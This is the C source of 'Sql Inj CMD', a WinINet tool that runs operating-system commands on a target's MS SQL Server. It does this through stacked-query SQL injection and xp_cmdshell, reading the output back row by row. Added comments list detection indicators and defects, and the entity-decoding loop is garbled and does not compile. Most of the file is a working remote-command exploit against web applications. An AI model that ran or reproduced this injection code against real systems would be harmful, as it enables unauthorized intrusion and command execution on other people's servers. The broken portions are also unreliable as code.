/* Injection state shared by ExecCommand() and main(). All three are assigned
   exactly once in main(): injurl = argv[1] (the target URL, already containing
   the injectable parameter), type/end = quoting prefix/suffix selected by argv[2].
   They point into argv or string literals, so nothing here is ever freed. */
char *injurl,*type,*end;
/* Fetch `url` over HTTP via WinINet and return the start of the response body.
   Network footprint, useful for detection: every request is sent with the
   User-Agent "SqlCMD" and INTERNET_FLAG_RELOAD, i.e. each probe is a fresh
   uncached GET whose query string carries the SQL in ExecCommand().
   Defects as written (left untouched here): the returned pointer refers to the
   local `buffer`, which no longer exists once the function returns (undefined
   behaviour); the handles from InternetOpen/InternetOpenUrl and the result of
   InternetReadFile are never checked; and the buffer is neither bounded by
   dwBytesRead nor NUL-terminated before the caller runs strstr() on it. */
char *GetResult(char *url)
{
char buffer[1024*8];
DWORD dwBytesRead=0;
HINTERNET hNet=InternetOpen("SqlCMD",PRE_CONFIG_INTERNET_ACCESS,NULL,INTERNET_INVALID_PORT_NUMBER,0);
HINTERNET hUrlFile=InternetOpenUrl(hNet,url,NULL,0,INTERNET_FLAG_RELOAD,0);
/* One read only: anything beyond sizeof(buffer) bytes of the page is dropped. */
BOOL bRead=InternetReadFile(hUrlFile,buffer,sizeof(buffer),&dwBytesRead);
InternetCloseHandle(hUrlFile);
InternetCloseHandle(hNet);
return buffer;   /* address of a local: dangling once the frame is gone */
}
/* Run `cmd` through a stacked-query SQL injection and print its output.
   Sequence, as the code shows it:
     1. one request that creates the scratch table [SIC_Tmp] and fills it
        with "EXEC MASTER..XP_CMDSHELL <cmd>" plus a trailing "[g_over]" row;
     2. one request per output row, reading row n back through an error/
        boolean condition whose response is bracketed by the literal marker
        "[CoolDiyer]";
     3. a final request that drops [SIC_Tmp] once "[g_over]" is read.
   Those three literals -- the table name [SIC_Tmp], the marker [CoolDiyer]
   and the sentinel [g_over] -- together with the xp_cmdshell call are the
   indicators to look for in web-server logs, WAF rules and SQL Server audit
   traces. Requires xp_cmdshell to be enabled and the application's database
   login to have the rights to call it.
   Defects as written (left untouched here): the function is declared to
   return char* but every `return` is bare; strncpy() on line 30 copies
   p1-p-11 bytes with no bound on sizeof(buff) and without checking that the
   second marker search (p1) found anything; the entity-decoding loop below
   has lost its character literals in this copy and does not compile. */
char *ExecCommand(char *cmd)
{
char url[1024],buff[1024],result[1024],*response,*p,*p1;
int n=1,i,j;
memset(url,0,sizeof(url));
/* Step 1: create the scratch table and capture xp_cmdshell output into it.
   wsprintf() is unbounded: a long cmd overruns url[1024]. */
wsprintf(url,"%s%s;CREATE TABLE [SIC_Tmp]([id] int NOT NULL IDENTITY (1,1), [ResultTxt] nvarchar(4000) NULL);insert into [SIC_Tmp](ResultTxt) EXEC MASTER..XP_CMDSHELL %s;insert into [SIC_Tmp] values ([g_over])--",injurl,type,cmd);
response=GetResult(url);
/* Step 2: pull rows back one at a time, ordered by id, until the sentinel. */
while(1){
memset(buff,0,sizeof(buff));
memset(result,0,sizeof(result));
/* "%%2B" is a URL-encoded '+', i.e. string concatenation on the server side. */
wsprintf(url,"%s%s and (select top 1 case when ResultTxt is Null then [CoolDiyer][CoolDiyer] else [CoolDiyer]%%2BResultTxt%%2B[CoolDiyer] end from (select top %d id,ResultTxt from [SIC_Tmp] order by [id]) T order by [id] desc)>0%s",injurl,type,n,end);
response=GetResult(url);   /* response points at GetResult's dead stack frame */
if(p=strstr(response,"[CoolDiyer]"))p1=strstr(p+11,"[CoolDiyer]");   /* 11 == strlen("[CoolDiyer]") */
else {
puts("Cannt Injection It");
return;   /* bare return from a char* function */
}
strncpy(buff,p+11,p1-p-11);   /* p1 may be NULL; length is not bounded by sizeof(buff) */
/* Step 3: sentinel row reached -- clean up the scratch table and stop. */
if (!strcmp(buff,"[g_over]")){
wsprintf(url,"%s%s;DROP TABLE [SIC_Tmp]--",injurl,type);
GetResult(url);
return;
}
//filter
/* NOTE: the loop header and the character literals below ('<', '>', '"', '&',
   and the quotes around l/g/q/u/o/t/;) were stripped in this copy of the file,
   so the block as shown does not compile. From what remains it appears to
   decode the HTML entities &lt; &gt; &quot; in buff into result while copying
   everything else through unchanged -- treat that reading as inferred. */
for(i=0,j=0;iif(buff==& && buff[i+2]==t && buff[i+3]==;){
if (buff[i+1]==l)result[j]=<;
if (buff[i+1]==g)result[j]=>;
i+=3;
}
else if(buff==& && buff[i+1]==q && buff[i+2]==u && buff[i+3]==o && buff[i+4]==t && buff[i+5]==;){
result[j]=";
i+=5;
}
else result[j]=buff;
}
puts(result);
memset(url,0,sizeof(url));
n++;
}
}
/* Entry point: sqlcmd.exe <url> <type>. Prints a banner, selects the quoting
   style for the injectable parameter from argv[2], then loops on the
   "Sql Inj CMD>" prompt handing each line to ExecCommand() until "exit".
   Non-standard/unsafe as written (left untouched here): `void main` is not a
   conforming signature, and gets() reads into cmd[1024] with no bound. */
void main(int argc,char **argv)
{
char cmd[1024];
printf("=[Sql Inj CMD]======================================================\n");
printf("\tSQL Injection Command Exploit Powered By CoolDiyer\n\n");
if(argc!=3){
printf("\tUsage:sqlcmd.exe \n");
printf("\t\tType:\t0->Number1->char2->Search\n");
printf("\tExample:\n\t\tsqlcmd.exe http://localhost/index.asp?id=1 0\n");
printf("=05-12-22===========================================================\n");
return;
}
injurl=argv[1];
/* type is appended to the URL before the SQL, end after it; the values for
   modes 1 and 2 look like they have lost their quote characters in this copy
   of the file (cf. the usage text: 0 = numeric, 1 = char, 2 = search). Any
   argv[2] other than 0/1/2 leaves type and end NULL. */
if(atoi(argv[2])==0){
type="";
end="";
}
if(atoi(argv[2])==1){
type="";
end=" and =";
}
if(atoi(argv[2])==2){
type="%";
end=" and %=";
}
while (1)
{
printf("Sql Inj CMD>");
gets(cmd);   /* unbounded read into a 1024-byte buffer */
if (!strcmpi(cmd,"exit"))return;   /* case-insensitive compare (MSVC name) */
ExecCommand(cmd);
}
}